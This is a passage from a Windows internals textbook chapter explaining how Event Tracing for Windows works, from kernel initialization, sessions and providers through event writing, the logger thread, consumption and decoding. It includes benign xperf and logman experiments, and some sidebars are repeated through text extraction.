format) file for allowing the consumer to decode trace events.
I
Manifest-based providers use an XML manifest file to define events that can be decoded by
the consumer.
I
TraceLogging providers, which, like WPP providers are used for fast tracing the operation of an
application of driver, use self-describing events that contain all the required information for the
consumption by the controller.
500
CHAPTER 10 Management, diagnostics, and tracing
When first installed, Windows already includes dozens of providers, which are used by each com-
ponent of the OS for logging diagnostics events and performance traces. For example, Hyper-V has
multiple providers, which provide tracing events for the Hypervisor, Dynamic Memory, Vid driver, and
Virtualization stack. As shown in Figure 10-31, ETW is implemented in different components:
I
Most of the ETW implementation (global session creation, provider registration and enable-
ment, main logger thread) resides in the NT kernel.
I
The Host for SCM/SDDL/LSA Lookup APIs library (sechost.dll) provides to applications the main
user-mode APIs used for creating an ETW session, enabling providers and consuming events.
Sechost uses services provided by Ntdll to invoke ETW in the NT kernel. Some ETW user-mode
APIs are implemented directly in Ntdll without exposing the functionality to Sechost. Provider
registration and events generation are examples of user-mode functionalities that are imple-
mented in Ntdll (and not in Sechost).
I
The Event Trace Decode Helper Library (TDH.dll) implements services available for consumers
to decode ETW events.
I
The Eventing Consumption and Configuration library (WevtApi.dll) implements the Windows
Event Log APIs (also known as Evt APIs), which are available to consumer applications for man-
aging providers and events on local and remote machines. Windows Event Log APIs support
XPath 1.0 or structured XML queries for parsing events produced by an ETW session.
I
The Secure Kernel implements basic secure services able to interact with ETW in the NT kernel
that lives in VTL 0. This allows trustlets and the Secure Kernel to use ETW for logging their own
secure events.
WevtApi.dll
Sechost.dll
Secure Kernel
ETW
(NT Kernel)
TDH.dll
User Mode
Kernel Mode
Decode
Events
Consumer App.
Consume
Events
Kernel Drivers
Kernel Drivers
Kernel Drivers
Controller App.
Provider App.
NTDLL.DLL
FIGURE 10-31 ETW architecture.
CHAPTER 10 Management, diagnostics, and tracing
501
ETW initialization
The ETW initialization starts early in the NT kernel startup (for more details on the NT kernel initial-
ization, see Chapter 12). It is orchestrated by the internal EtwInitialize function in three phases. The
phase 0 of the NT kernel initialization calls EtwInitialize to properly allocate and initialize the per-silo
ETW-specific data structure that stores the array of logger contexts representing global ETW sessions
(see the “ETW session” section later in this chapter for more details). The maximum number of global
sessions is queried from the HKLM\System\CurrentControlSet\Control\WMI\EtwMaxLoggers regis-
try value, which should be between 32 and 256, (64 is the default number in case the registry value
does not exist).
Later, in the NT kernel startup, the IoInitSystemPreDrivers routine of phase 1 continues with the
initialization of ETW, which performs the following steps:
1.
Acquires the system startup time and reference system time and calculates the QPC frequency.
2.
Initializes the ETW security key and reads the default session and provider’s security descriptor.
3.
Initializes the per-processor global tracing structures located in the PRCB.
4.
Creates the real-time ETW consumer object type (called EtwConsumer), which is used to allow
a user-mode real-time consumer process to connect to the main ETW logger thread and the
ETW registration (internally called EtwRegistration) object type, which allow a provider to be
registered from a user-mode application.
5.
Registers the ETW bugcheck callback, used to dump logger sessions data in the bugcheck dump.
6.
Initializes and starts the Global logger and Autologgers sessions, based on the AutoLogger and
GlobalLogger registry keys located under the HKLM\System\CurrentControlSet\Control\WMI
root key.
7.
Uses the EtwRegister kernel API to register various NT kernel event providers, like the Kernel
Event Tracing, General Events provider, Process, Network, Disk, File Name, IO, and Memory
providers, and so on.
8.
Publishes the ETW initialized WNF state name to indicate that the ETW subsystem is initialized.
9.
Writes the SystemStart event to both the Global Trace logging and General Events providers.
The event, which is shown in Figure 10-32, logs the approximate OS Startup time.
10. If required, loads the FileInfo driver, which provides supplemental information on files I/O to
Superfetch (more information on the Proactive memory management is available in Chapter 5
of Part 1).
502
CHAPTER 10 Management, diagnostics, and tracing
FIGURE 10-32 The SystemStart ETW event displayed by the Event Viewer.
In early boot phases, the Windows registry and I/O subsystems are still not completely initialized. So
ETW can’t directly write to the log files. Late in the boot process, after the Session Manager (SMSS.exe)
has correctly initialized the software hive, the last phase of ETW initialization takes place. The purpose
of this phase is just to inform each already-registered global ETW session that the file system is ready,
so that they can flush out all the events that are recorded in the ETW buffers to the log file.
ETW sessions
One of the most important entities of ETW is the Session (internally called logger instance), which is a
glue between providers and consumers. An event tracing session records events from one or more pro-
viders that a controller has enabled. A session usually contains all the information that describes which
events should be recorded by which providers and how the events should be processed. For example,
a session might be configured to accept all events from the Microsoft-Windows-Hyper-V-Hypervisor
provider (which is internally identified using the {52fc89f8-995e-434c-a91e-199986449890} GUID). The
user can also configure filters. Each event generated by a provider (or a provider group) can be filtered
based on event level (information, warning, error, or critical), event keyword, event ID, and other char-
acteristics. The session configuration can also define various other details for the session, such as what
time source should be used for the event timestamps (for example, QPC, TSC, or system time), which
events should have stack traces captured, and so on. The session has the important rule to host the
ETW logger thread, which is the main entity that flushes the events to the log file or delivers them to
the real-time consumer.
CHAPTER 10 Management, diagnostics, and tracing
503
Sessions are created using the StartTrace API and configured using ControlTrace and EnableTraceEx2.
Command-line tools such as xperf, logman, tracelog, and wevtutil use these APIs to start or control
trace sessions. A session also can be configured to be private to the process that creates it. In this case,
ETW is used for consuming events created only by the same application that also acts as provider. The
application thus eliminates the overhead associated with the kernel-mode transition. Private ETW ses-
sions can record only events for the threads of the process in which it is executing and cannot be used
with real-time delivery. The internal architecture of private ETW is not described in this book.
When a global session is created, the StartTrace API validates the parameters and copies them in a
data structure, which the NtTraceControl API uses to invoke the internal function EtwpStartLogger in the
kernel. An ETW session is represented internally through an ETW_LOGGER_CONTEXT data structure,
which contains the important pointers to the session memory buffers, where the events are written
to. As discussed in the “ETW initialization” section, a system can support a limited number of ETW ses-
sions, which are stored in an array located in a global per-SILO data structure. EtwpStartLogger checks
the global sessions array, determining whether there is free space or if a session with the same name
already exists. If that is the case, it exits and signals an error. Otherwise, it generates a session GUID (if
not already specified by the caller), allocates and initializes an ETW_LOGGER_CONTEXT data structure
representing the session, assigns to it an index, and inserts it in the per-silo array.
ETW queries the session’s security descriptor located in the HKLM\System\CurrentControlSet\
Control\Wmi\Security registry key. As shown in Figure 10-33, each registry value in the key is named as
the session GUID (the registry key, however, also contains the provider’s GUID) and contains the binary
representation of a self-relative security descriptor. If a security descriptor for the session does not ex-
ist, a default one is returned for the session (see the “Witnessing the default security descriptor of ETW
sessions” experiment later in this chapter for details).
FIGURE 10-33 The ETW security registry key.
504
CHAPTER 10 Management, diagnostics, and tracing
The EtwpStartLogger function performs an access check on the session’s security descriptor, request-
ing the TRACELOG_GUID_ENABLE access right (and the TRACELOG_CREATE_REALTIME or TRACELOG_
CREATE_ONDISK depending on the log file mode) using the current process’s access token. If the check
succeeds, the routine calculates the default size and numbers of event buffers, which are calculated
based on the size of the system physical memory (the default buffer size is 8, 16, or 64KB). The number
of buffers depends on the number of system processors and on the presence of the EVENT_TRACE_
NO_PER_PROCESSOR_BUFFERING logger mode flag, which prevents events (which can be generated
from different processors) to be written to a per-processor buffer.
ETW acquires the session’s initial reference time stamp. Three clock resolutions are currently support-
ed: Query performance counter (QPC, a high-resolution time stamp not affected by the system clock),
System time, and CPU cycle counter. The EtwpAllocateTraceBuffer function is used to allocate each buffer
associated with the logger session (the number of buffers was calculated before or specified as input
from the user). A buffer can be allocated from the paged pool, nonpaged pool, or directly from physical
large pages, depending on the logging mode. Each buffer is stored in multiple internal per-session lists,
which are able to provide fast lookup both to the ETW main logger thread and ETW providers. Finally,
if the log mode is not set to a circular buffer, the EtwpStartLogger function starts the main ETW logger
thread, which has the goal of flushing events written by the providers associated with the session to the
log file or to the real-time consumer. After the main thread is started, ETW sends a session notification to
the registered session notification provider (GUID 2a6e185b-90de-4fc5-826c-9f44e608a427), a special
provider that allows its consumers to be informed when certain ETW events happen (like a new session
being created or destroyed, a new log file being created, or a log error being raised).
EXPERIMENT: Enumerating ETW sessions
In Windows 10, there are multiple ways to enumerate active ETW sessions. In this and all the
next experiments regarding ETW, you will use the XPERF tool, which is part of the Windows
Performance Toolkit distributed in the Windows Assessment and Deployment Kit (ADK), which
is freely downloadable from https://docs.microsoft.com/en-us/windows-hardware/get-started/
adk-install.
Enumerating active ETW sessions can be done in multiple ways. XPERF can do it while
executed with the following command (usually XPERF is installed in C:\Program Files
(x86)\Windows Kits\10\Windows Performance Toolkit):
xperf -Loggers
The output of the command can be huge, so it is strongly advised to redirect the output in
a TXT file:
xperf -Loggers > ETW_Sessions.txt
EXPERIMENT: Enumerating ETW sessions
In Windows 10, there are multiple ways to enumerate active ETW sessions. In this and all the
next experiments regarding ETW, you will use the XPERF tool, which is part of the Windows
Performance Toolkit distributed in the Windows Assessment and Deployment Kit (ADK), which
is freely downloadable from https://docs.microsoft.com/en-us/windows-hardware/get-started/
adk-install.
Enumerating active ETW sessions can be done in multiple ways. XPERF can do it while
executed with the following command (usually XPERF is installed in C:\Program Files
(x86)\Windows Kits\10\Windows Performance Toolkit):
xperf -Loggers
The output of the command can be huge, so it is strongly advised to redirect the output in
a TXT file:
xperf -Loggers > ETW_Sessions.txt
CHAPTER 10 Management, diagnostics, and tracing
505
The tool can decode and show in a human-readable form all the session configuration data.
An example is given from the EventLog-Application session, which is used by the Event logger
service (Wevtsvc.dll) to write events in the Application.evtx file shown by the Event Viewer:
Logger Name : EventLog-Application
Logger Id : 9
Logger Thread Id : 000000000000008C
Buffer Size
: 64
Maximum Buffers
: 64
Minimum Buffers
: 2
Number of Buffers : 2
Free Buffers
: 2
Buffers Written : 252
Events Lost
: 0
Log Buffers Lost
: 0
Real Time Buffers Lost: 0
Flush Timer : 1
Age Limit : 0
Real Time Mode : Enabled
Log File Mode
: Secure PersistOnHybridShutdown PagedMemory IndependentSession
NoPerProcessorBuffering
Maximum File Size : 100
Log Filename :
Trace Flags
: "Microsoft-Windows-CertificateServicesClient-Lifecycle-User":0x800
0000000000000:0xff+"Microsoft-Windows-SenseIR":0x8000000000000000:0xff+
... (output cut for space reasons)
The tool is also able to decode the name of each provider enabled in the session and the
bitmask of event categories that the provider should write to the sessions. The interpretation of
the bitmask (shown under “Trace Flags”) depends on the provider. For example, a provider can
define that the category 1 (bit 0 set) indicates the set of events generated during initialization
and cleanup, category 2 (bit 1 set) indicates the set of events generated when registry I/O is per-
formed, and so on. The trace flags are interpreted differently for System sessions (see the “System
loggers” section for more details.) In that case, the flags are decoded from the enabled kernel
flags that specify which kind of kernel events the system session should log.
The Windows Performance Monitor, in addition to dealing with system performance counters,
can easily enumerate the ETW sessions. Open Performance Monitor (by typing perfmon in the
Cortana search box), expand the Data Collector Sets, and click Event Trace Sessions. The applica-
tion should list the same sessions listed by XPERF. If you right-click a session’s name and select
Properties, you should be able to navigate between the session’s configurations. In particular, the
Security property sheet decodes the security descriptor of the ETW session.
The tool can decode and show in a human-readable form all the session configuration data.
An example is given from the EventLog-Application session, which is used by the Event logger
service (Wevtsvc.dll) to write events in the Application.evtx file shown by the Event Viewer:
Logger Name : EventLog-Application
Logger Id : 9
Logger Thread Id : 000000000000008C
Buffer Size
: 64
Maximum Buffers
: 64
Minimum Buffers
: 2
Number of Buffers : 2
Free Buffers
: 2
Buffers Written : 252
Events Lost
: 0
Log Buffers Lost
: 0
Real Time Buffers Lost: 0
Flush Timer : 1
Age Limit : 0
Real Time Mode : Enabled
Log File Mode
: Secure PersistOnHybridShutdown PagedMemory IndependentSession
NoPerProcessorBuffering
Maximum File Size : 100
Log Filename :
Trace Flags
: "Microsoft-Windows-CertificateServicesClient-Lifecycle-User":0x800
0000000000000:0xff+"Microsoft-Windows-SenseIR":0x8000000000000000:0xff+
... (output cut for space reasons)
The tool is also able to decode the name of each provider enabled in the session and the
bitmask of event categories that the provider should write to the sessions. The interpretation of
the bitmask (shown under “Trace Flags”) depends on the provider. For example, a provider can
define that the category 1 (bit 0 set) indicates the set of events generated during initialization
and cleanup, category 2 (bit 1 set) indicates the set of events generated when registry I/O is per-
formed, and so on. The trace flags are interpreted differently for System sessions (see the “System
loggers” section for more details.) In that case, the flags are decoded from the enabled kernel
flags that specify which kind of kernel events the system session should log.
The Windows Performance Monitor, in addition to dealing with system performance counters,
can easily enumerate the ETW sessions. Open Performance Monitor (by typing perfmon in the
Cortana search box), expand the Data Collector Sets, and click Event Trace Sessions. The applica-
tion should list the same sessions listed by XPERF. If you right-click a session’s name and select
Properties, you should be able to navigate between the session’s configurations. In particular, the
Security property sheet decodes the security descriptor of the ETW session.
Security property sheet decodes the security descriptor of the ETW session.
Security
506
CHAPTER 10 Management, diagnostics, and tracing
Finally, you also can use the Microsoft Logman console tool (%SystemRoot%\System32\
logman.exe) to enumerate active ETW sessions (by using the -ets command-line argument).
ETW providers
As stated in the previous sections, a provider is a component that produces events (while the applica-
tion that includes the provider contains event tracing instrumentation). ETW supports different kinds
of providers, which all share a similar programming model. (They are mainly different in the way in
which they encode events.) A provider must be initially registered with ETW before it can generate any
event. In a similar way, a controller application should enable the provider and associate it with an ETW
session to be able to receive events from the provider. If no session has enabled a provider, the pro-
vider will not generate any event. The provider defines its interpretation of being enabled or disabled.
Generally, an enabled provider generates events, and a disabled provider does not.
Providers registration
Each provider’s type has its own API that needs to be called by a provider application (or driver) for reg-
istering a provider. For example, manifest-based providers rely on the EventRegister API for user-mode
registrations, and EtwRegister for kernel-mode registrations. All the provider types end up calling the
internal EtwpRegisterProvider function, which performs the actual registration process (and is imple-
mented in both the NT kernel and NTDLL). The latter allocates and initializes an ETW_GUID_ENTRY data
structure, which represents the provider (the same data structure is used for notifications and traits).
The data structure contains important information, like the provider GUID, security descriptor, refer-
ence counter, enablement information (for each ETW session that enables the provider), and a list of
provider’s registrations.
Finally, you also can use the Microsoft Logman console tool (%SystemRoot%\System32\
logman.exe) to enumerate active ETW sessions (by using the -ets command-line argument).
CHAPTER 10 Management, diagnostics, and tracing
507
For user-mode provider registrations, the NT kernel performs an access check on the calling pro-
cess’s token, requesting the TRACELOG_REGISTER_GUIDS access right. If the check succeeds, or if the
registration request originated from kernel code, ETW inserts the new ETW_GUID_ENTRY data struc-
ture in a hash table located in the global ETW per-silo data structure, using a hash of the provider’s
GUID as the table’s key (this allows fast lookup of all the providers registered in the system.) In case an
entry with the same GUID already exists in the hash table, ETW uses the existing entry instead of the
new one. A GUID could already exist in the hash table mainly for two reasons:
I
Another driver or application has enabled the provider before it has been actually registered
(see the “Providers enablement” section later in this chapter for more details) .
I
The provider has been already registered once. Multiple registration of the same provider GUID
are supported.
After the provider has been successfully added into the global list, ETW creates and initializes an
ETW registration object, which represents a single registration. The object encapsulates an ETW_REG_
ENTRY data structure, which ties the provider to the process and session that requested its registration.
(ETW also supports registration from different sessions.) The object is inserted in a list located in the
ETW_GUID_ENTRY (the EtwRegistration object type has been previously created and registered with
the NT object manager at ETW initialization time). Figure 10-34 shows the two data structures and their
relationships. In the figure, two providers’ processes (process A, living in session 4, and process B, living
in session 16) have registered for provider 1. Thus two ETW_REG_ENTRY data structures have been cre-
ated and linked to the ETW_GUID_ENTRY representing provider 1.
…
…
ETW_REG_ENTRY
for provider app. A
which registered provider 1
ETW_GUID_ENTRY
(for provider 1)
ETW_Global
per-SILO hash-table
Reg. List Entry
ETW_GUID ptr.
Process B
Session ID 0x10
Callback’s Info
Flags
Traits
Reg. Enablement
Mask
ETW_REG_ENTRY
for provider app. B
which registered provider 1
ETW_GUID_ENTRY
(for provider 2)
ETW_GUID List
entry
ETW registrations
List head
Provider’s
GUID
Security
Descriptor
Ref.
Counter
Enablement
Information [8]
Filter
Data
Reg. List Entry
ETW_GUID ptr.
Process A
Session ID 0x4
Callback’s Info
Flags
Traits
Reg. Enablement
Mask
ETW_GUID List
entry
ETW registrations
List head
Provider’s
GUID
Security
Descriptor
Ref.
Counter
Enablement
Information [8]
Filter
Data
FIGURE 10-34 The ETW_GUID_ENTRY data structure and the ETW_REG_ENTRY.
At this stage, the provider is registered and ready to be enabled in the session(s) that requested it
(through the EnableTrace API). In case the provider has been already enabled in at least one session before
its registration, ETW enables it (see the next section for details) and calls the Enablement callback, which can
be specified by the caller of the EventRegister (or EtwRegister) API that started the registration process.
508
CHAPTER 10 Management, diagnostics, and tracing
EXPERIMENT: Enumerating ETW providers
As for ETW sessions, XPERF can enumerate the list of all the current registered providers (the
WEVTUTIL tool, installed with Windows, can do the same). Open an administrative command
prompt window and move to the Windows Performance Toolkit path. To enumerate the reg-
istered providers, use the -providers command option. The option supports different flags.
For this experiment, you will be interested in the I and R flags, which tell XPERF to enumerate
the installed or registered providers. As we will discuss in the “Decoding events” section later
in this chapter, the difference is that a provider can be registered (by specifying a GUID) but
not installed in the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers
registry key. This will prevent any consumer from decoding the event using TDH routines. The
following commands
cd /d “C:\Program Files (x86)\Windows Kits\10\Windows Performance Toolkit”
xperf -providers R > registered_providers.txt
xperf -providers I > installed_providers.txt
produce two text files with similar information. If you open the registered_providers.txt file,
you will find a mix of names and GUIDs. Names identify providers that are also installed in the
Publisher registry key, whereas GUID represents providers that have just been registered through
the EventRegister API discussed in this section. All the names are present also in the installed_
providers.txt file with their respective GUIDs, but you won’t find any GUID listed in the first text
file in the installed providers list.
XPERF also supports the enumeration of all the kernel flags and groups supported by system
loggers (discussed in the “System loggers” section later in this chapter) through the K flag (which
is a superset of the KF and KG flags).
Provider Enablement
As introduced in the previous section, a provider should be associated with an ETW session to be able
to generate events. This association is called Provider Enablement, and it can happen in two ways:
before or after the provider is registered. A controller application can enable a provider on a session
through the EnableTraceEx API. The API allows you to specify a bitmask of keywords that determine the
category of events that the session wants to receive. In the same way, the API supports advanced filters
on other kinds of data, like the process IDs that generate the events, package ID, executable name,
and so on. (You can find more information at https://docs.microsoft.com/en-us/windows/win32/api/
evntprov/ns-evntprov-event_filter_descriptor.)
Provider Enablement is managed by ETW in kernel mode through the internal EtwpEnableGuid
function. For user-mode requests, the function performs an access check on both the session and
provider security descriptors, requesting the TRACELOG_GUID_ENABLE access right on behalf of
the calling process’s token. If the logger session includes the SECURITY_TRACE flag, EtwpEnableGuid
requires that the calling process is a PPL (see the “ETW security” section later in this chapter for more
details). If the check succeeds, the function performs a similar task to the one discussed previously for
provider registrations:
EXPERIMENT: Enumerating ETW providers
As for ETW sessions, XPERF can enumerate the list of all the current registered providers (the
WEVTUTIL tool, installed with Windows, can do the same). Open an administrative command
prompt window and move to the Windows Performance Toolkit path. To enumerate the reg-
istered providers, use the -providers command option. The option supports different flags.
For this experiment, you will be interested in the I and R flags, which tell XPERF to enumerate
the installed or registered providers. As we will discuss in the “Decoding events” section later
in this chapter, the difference is that a provider can be registered (by specifying a GUID) but
not installed in the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers
registry key. This will prevent any consumer from decoding the event using TDH routines. The
following commands
cd /d “C:\Program Files (x86)\Windows Kits\10\Windows Performance Toolkit”
xperf -providers R > registered_providers.txt
xperf -providers I > installed_providers.txt
produce two text files with similar information. If you open the registered_providers.txt file,
you will find a mix of names and GUIDs. Names identify providers that are also installed in the
Publisher registry key, whereas GUID represents providers that have just been registered through
the EventRegister API discussed in this section. All the names are present also in the installed_
EventRegister API discussed in this section. All the names are present also in the installed_
EventRegister
providers.txt file with their respective GUIDs, but you won’t find any GUID listed in the first text
file in the installed providers list.
XPERF also supports the enumeration of all the kernel flags and groups supported by system
loggers (discussed in the “System loggers” section later in this chapter) through the K flag (which
is a superset of the KF and KG flags).
CHAPTER 10 Management, diagnostics, and tracing
509
I
It allocates and initializes an ETW_GUID_ENTRY data structure to represent the provider or use
the one already linked in the global ETW per-silo data structure in case the provider has been
already registered.
I
Links the provider to the logger session by adding the relative session enablement information
in the ETW_GUID_ENTRY.
In case the provider has not been previously registered, no ETW registration object exists that’s
linked in the ETW_GUID_ENTRY data structure, so the procedure terminates. (The provider will be
enabled after it is first registered.) Otherwise, the provider is enabled.
While legacy MOF providers and WPP providers can be enabled only to one session at time,
Manifest-based and Tracelogging providers can be enabled on a maximum of eight sessions. As previ-
ously shown in Figure 10-32, the ETW_GUID_ENTRY data structure contains enablement information
for each possible ETW session that enabled the provider (eight maximum). Based on the enabled ses-
sions, the EtwpEnableGuid function calculates a new session enablement mask, storing it in the ETW_
REG_ENTRY data structure (representing the provider registration). The mask is very important because
it’s the key for event generations. When an application or driver writes an event to the provider, a
check is made: if a bit in the enablement mask equals 1, it means that the event should be written to the
buffer maintained by a particular ETW session; otherwise, the session is skipped and the event is not
written to its buffer.
Note that for secure sessions, a supplemental access check is performed before updating the ses-
sion enablement mask in the provider registration. The ETW session’s security descriptor should allow
the TRACELOG_LOG_EVENT access right to the calling process’s access token. Otherwise, the relative
bit in the enablement mask is not set to 1. (The target ETW session will not receive any event from the
provider registration.) More information on secure sessions is available in the “Secure loggers and ETW
security” section later in this chapter.
Providing events
After registering one or more ETW providers, a provider application can start to generate events. Note
that events can be generated even though a controller application hasn’t had the chance to enable the
provider in an ETW session. The way in which an application or driver can generate events depends on
the type of the provider. For example, applications that write events to manifest-based providers usu-
ally directly create an event descriptor (which respects the XML manifest) and use the EventWrite API
to write the event to the ETW sessions that have the provider enabled. Applications that manage MOF
and WPP providers rely on the TraceEvent API instead.
Events generated by manifest-based providers, as discussed previously in the “ETW session” sec-
tion, can be filtered by multiple means. ETW locates the ETW_GUID_ENTRY data structure from the
provider registration object, which is provided by the application through a handle. The internal
EtwpEventWriteFull function uses the provider’s registration session enablement mask to cycle between
all the enabled ETW sessions associated with the provider (represented by an ETW_LOGGER_CONTEXT).
For each session, it checks whether the event satisfies all the filters. If so, it calculates the full size of the
event’s payload and checks whether there is enough free space in the session’s current buffer.
510
CHAPTER 10 Management, diagnostics, and tracing
If there is no available space, ETW checks whether there is another free buffer in the session: free
buffers are stored in a FIFO (first-in, first-out) queue. If there is a free buffer, ETW marks the old buffer
as “dirty” and switches to the new free one. In this way, the Logger thread can wake up and flush the
entire buffer to a log file or deliver it to a real-time consumer. If the session’s log mode is a circular log-
ger, no logger thread is ever created: ETW simply links the old full buffer at the end of the free buffers
queue (as a result the queue will never be empty). Otherwise, if there isn’t a free buffer in the queue,
ETW tries to allocate an additional buffer before returning an error to the caller.
After enough space in a buffer is found, EtwpEventWriteFull atomically writes the entire event
payload in the buffer and exits. Note that in case the session enablement mask is 0, it means that no
sessions are associated with the provider. As a result, the event is lost and not logged anywhere.
MOF and WPP events go through a similar procedure but support only a single ETW session and
generally support fewer filters. For these kinds of providers, a supplemental check is performed on the
associated session: If the controller application has marked the session as secure, nobody can write
any events. In this case, an error is yielded back to the caller (secure sessions are discussed later in the
“Secure loggers and ETW security” section).
EXPERIMENT: Listing processes activity using ETW
In this experiment, will use ETW to monitor system’s processes activity. Windows 10 has two provid-
ers that can monitor this information: Microsoft-Windows-Kernel-Process and the NT kernel log-
ger through the PROC_THREAD kernel flags. You will use the former, which is a classic provider and
already has all the information for decoding its events. You can capture the trace with multiple tools.
You still use XPERF (Windows Performance Monitor can be used, too).
Open a command prompt window and type the following commands:
cd /d “C:\Program Files (x86)\Windows Kits\10\Windows Performance Toolkit”
xperf -start TestSession -on Microsoft-Windows-Kernel-Process -f c:\process_trace.etl
The command starts an ETW session called TestSession (you can replace the name) that will
consume events generated by the Kernel-Process provider and store them in the C:\process_
trace.etl log file (you can also replace the file name).
To verify that the session has actually started, repeat the steps described previously in the
“Enumerating ETW sessions” experiment. (The TestSession trace session should be listed by both
XPERF and the Windows Performance Monitor.) Now, you should start some new processes or
applications (like Notepad or Paint, for example).
To stop the ETW session, use the following command:
xperf -stop TestSession
The steps used for decoding the ETL file are described later in the “Decoding an ETL file”
experiment. Windows includes providers for almost all its components. The Microsoft-Windows-
MSPaint provider, for example, generates events based on Paint’s functionality. You can try this
experiment by capturing events from the MsPaint provider.
EXPERIMENT: Listing processes activity using ETW
In this experiment, will use ETW to monitor system’s processes activity. Windows 10 has two provid-
ers that can monitor this information: Microsoft-Windows-Kernel-Process and the NT kernel log-
ger through the PROC_THREAD kernel flags. You will use the former, which is a classic provider and
already has all the information for decoding its events. You can capture the trace with multiple tools.
You still use XPERF (Windows Performance Monitor can be used, too).
Open a command prompt window and type the following commands:
cd /d “C:\Program Files (x86)\Windows Kits\10\Windows Performance Toolkit”
xperf -start TestSession -on Microsoft-Windows-Kernel-Process -f c:\process_trace.etl
The command starts an ETW session called TestSession (you can replace the name) that will
consume events generated by the Kernel-Process provider and store them in the C:\process_
trace.etl log file (you can also replace the file name).
To verify that the session has actually started, repeat the steps described previously in the
“Enumerating ETW sessions” experiment. (The TestSession trace session should be listed by both
XPERF and the Windows Performance Monitor.) Now, you should start some new processes or
applications (like Notepad or Paint, for example).
To stop the ETW session, use the following command:
xperf -stop TestSession
The steps used for decoding the ETL file are described later in the “Decoding an ETL file”
experiment. Windows includes providers for almost all its components. The Microsoft-Windows-
MSPaint provider, for example, generates events based on Paint’s functionality. You can try this
experiment by capturing events from the MsPaint provider.
CHAPTER 10 Management, diagnostics, and tracing
511
ETW Logger thread
The Logger thread is one of the most important entities in ETW. Its main purpose is to flush events to
the log file or deliver them to the real-time consumer, keeping track of the number of delivered and
lost events. A logger thread is started every time an ETW session is initially created, but only in case the
session does not use the circular log mode. Its execution logic is simple. After it’s started, it links itself
to the ETW_LOGGER_CONTEXT data structure representing the associated ETW session and waits on
two main synchronization objects. The Flush event is signaled by ETW every time a buffer belonging
to a session becomes full (which can happen after a new event has been generated by a provider—for
example, as discussed in the previous section, “Providing events”), when a new real-time consumer
has requested to be connected, or when a logger session is going to be stopped. The TimeOut timer is
initialized to a valid value (usually 1 second) only in case the session is a real-time one or in case the user
has explicitly required it when calling the StartTrace API for creating the new session.
When one of the two synchronization objects is signaled, the logger thread rearms them and
checks whether the file system is ready. If not, the main logger thread returns to sleep again (no ses-
sions should be flushed in early boot stages). Otherwise, it starts to flush each buffer belonging to the
session to the log file or the real-time consumer.
For real-time sessions, the logger thread first creates a temporary per-session ETL file in the
%SystemRoot%\ System32\LogFiles\WMI\RtBackup folder (as shown in Figure 10-35.) The log file name
is generated by adding the EtwRT prefix to the name of the real-time session. The file is used for saving
temporary events before they are delivered to a real-time consumer (the log file can also store lost events
that have not been delivered to the consumer in the proper time frame). When started, real-time auto-
loggers restore lost events from the log file with the goal of delivering them to their consumer.
FIGURE 10-35 Real-time temporary ETL log files.
512
CHAPTER 10 Management, diagnostics, and tracing
The logger thread is the only entity able to establish a connection between a real-time consumer
and the session. The first time that a consumer calls the ProcessTrace API for receiving events from a
real-time session, ETW sets up a new RealTimeConsumer object and uses it with the goal of creating a
link between the consumer and the real-time session. The object, which resolves to an ETW_REALTIME_
CONSUMER data structure in the NT kernel, allows events to be “injected” in the consumer’s process
address space (another user-mode buffer is provided by the consumer application).
For non–real-time sessions, the logger thread opens (or creates, in case the file does not exist) the
initial ETL log file specified by the entity that created the session. The logger thread can also create a
brand-new log file in case the session’s log mode specifies the EVENT_TRACE_FILE_MODE_NEWFILE
flag, and the current log file reaches the maximum size.
At this stage, the ETW logger thread initiates a flush of all the buffers associated with the session
to the current log file (which, as discussed, can be a temporary one for real-time sessions). The flush is
performed by adding an event header to each event in the buffer and by using the NtWriteFile API for
writing the binary content to the ETL log file. For real-time sessions, the next time the logger thread
wakes up, it is able to inject all the events stored in the temporary log file to the target user-mode real-
time consumer application. Thus, for real-time sessions, ETW events are never delivered synchronously.
Consuming events
Events consumption in ETW is performed almost entirely in user mode by a consumer application,
thanks to the services provided by the Sechost.dll. The consumer application uses the OpenTrace API
for opening an ETL log file produced by the main logger thread or for establishing the connection to
a real-time logger. The application specifies an event callback function, which is called every time ETW
consumes a single event. Furthermore, for real-time sessions, the application can supply an optional
buffer-callback function, which receives statistics for each buffer that ETW flushes and is called every
time a single buffer is full and has been delivered to the consumer.
The actual event consumption is started by the ProcessTrace API. The API works for both standard
and real-time sessions, depending on the log file mode flags passed previously to OpenTrace.
For real-time sessions, the API uses kernel mode services (accessed through the NtTraceControl
system call) to verify that the ETW session is really a real-time one. The NT kernel verifies that the secu-
rity descriptor of the ETW session grants the TRACELOG_ACCESS_REALTIME access right to the caller
process’s token. If it doesn’t have access, the API fails and returns an error to the controller applica-
tion. Otherwise, it allocates a temporary user-mode buffer and a bitmap used for receiving events and
connects to the main logger thread (which creates the associated EtwConsumer object; see the “ETW
logger thread” section earlier in this chapter for details). Once the connection is established, the API
waits for new data arriving from the session’s logger thread. When the data comes, the API enumerates
each event and calls the event callback.
For normal non–real-time ETW sessions, the ProcessTrace API performs a similar processing, but
instead of connecting to the logger thread, it just opens and parses the ETL log file, reading each buf-
fer one by one and calling the event callback for each found event (events are sorted in chronological
order). Differently from real-time loggers, which can be consumed one per time, in this case the API
CHAPTER 10 Management, diagnostics, and tracing
513
can work even with multiple trace handles created by the OpenTrace API, which means that it can parse
events from different ETL log files.
Events belonging to ETW sessions that use circular buffers are not processed using the described
methodology. (There is indeed no logger thread that dumps any event.) Usually a controller applica-
tion uses the FlushTrace API when it wants to dump a snapshot of the current buffers belonging to an
ETW session configured to use a circular buffer into a log file. The API invokes the NT kernel through
the NtTraceControl system call, which locates the ETW session and verifies that its security descrip-
tor grants the TRACELOG_CREATE_ONDISK access right to the calling process’s access token. If so,
and if the controller application has specified a valid log file name, the NT kernel invokes the internal
EtwpBufferingModeFlush routine, which creates the new ETL file, adds the proper headers, and writes
all the buffers associated with the session. A consumer application can then parse the events written in
the new log file by using the OpenTrace and ProcessTrace APIs, as described earlier.
Events decoding
When the ProcessTrace API identifies a new event in an ETW buffer, it calls the event callback, which
is generally located in the consumer application. To be able to correctly process the event, the con-
sumer application should decode the event payload. The Event Trace Decode Helper Library (TDH.dll)
provides services to consumer applications for decoding events. As discussed in the previous sections,
a provider application (or driver), should include information that describes how to decode the events
generated by its registered providers.
This information is encoded differently based on the provider type. Manifest-based providers, for
example, compile the XML descriptor of their events in a binary file and store it in the resource section
of their provider application (or driver). As part of provider registration, a setup application should
